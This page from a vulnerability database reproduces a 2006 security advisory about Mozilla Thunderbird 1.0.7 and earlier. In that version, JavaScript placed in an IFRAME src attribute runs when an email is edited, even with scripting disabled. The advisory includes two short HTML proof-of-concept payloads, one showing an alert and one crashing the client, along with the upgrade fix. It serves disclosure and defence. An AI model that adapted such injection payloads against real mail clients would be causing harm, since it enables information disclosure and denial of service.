Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mozThunDoS.txt

🗓️ 26 Feb 2006 00:00:00Reported by nono2357Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Mozilla Thunderbird Remote Code Execution & Denial of Servic

Code
`Mozilla Thunderbird : Remote Code Execution & Denial of Service  
  
//----- Advisory  
  
  
Program : Mozilla Thunderbird  
Homepage : http://www.mozilla.com/thunderbird/  
Tested version : <= 1.0.7  
Found by : nono2357 at sysdream dot com  
This advisory : nono2357 at sysdream dot com  
Discovery date : 2006/01/28  
  
  
//----- Application description  
  
  
Full-Featured Email  
  
Simple to use, powerful, and customizable, Thunderbird is a full-featured  
email application. Thunderbird supports IMAP and POP mail protocols, as well  
as HTML mail formatting. Easily import your existing email accounts and  
messages. Built-in RSS capabilities, powerful quick search, spell check  
as you  
type, global inbox, deleting attachments and advanced message filtering  
round  
out Thunderbird's modern feature set.  
  
  
//----- Description of vulnerability  
  
  
Thunderbird's WYSIWYG rendering engine insufficiently filters javascript  
scripts. It is possible to write javascript in the SRC attribute of the  
IFRAME  
tag. This leads to execution when the email is edited (for instance when  
replying to the email), even if javascript is disabled in the preferences.  
  
  
//----- Proof Of Concept  
  
  
* Javascript execution :  
  
<html>  
<body>  
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>  
</body>  
</html>  
  
* Denial of service (application crash) :  
  
<html>  
<body>  
<iframe src="javascript:parent.document.write('Found by www.sysdream.com  
!')"></iframe>  
</body>  
</html>  
  
  
//----- Solution  
  
  
Upgrade to version 1.5.  
  
Download page : http://www.mozilla.com/thunderbird/all.html  
Direct link :  
http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/  
  
  
//----- Impact  
  
  
Successful exploitation may lead to information disclosure (application  
version, platform, user emails, user preferences, ...) or could crash the  
application.   
  
  
//----- Credits  
  
  
http://www.sysdream.com  
nono2357 at sysdream dot com  
  
  
//----- Greetings  
  
  
crashfr & the hackademy ...  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
mozilla thunderbirdremote code executiondenial of servicewysiwyg rendering enginejavascript vulnerabilityversion 1.0.7information disclosureapplication crashupgrade solutionsysdream.com
23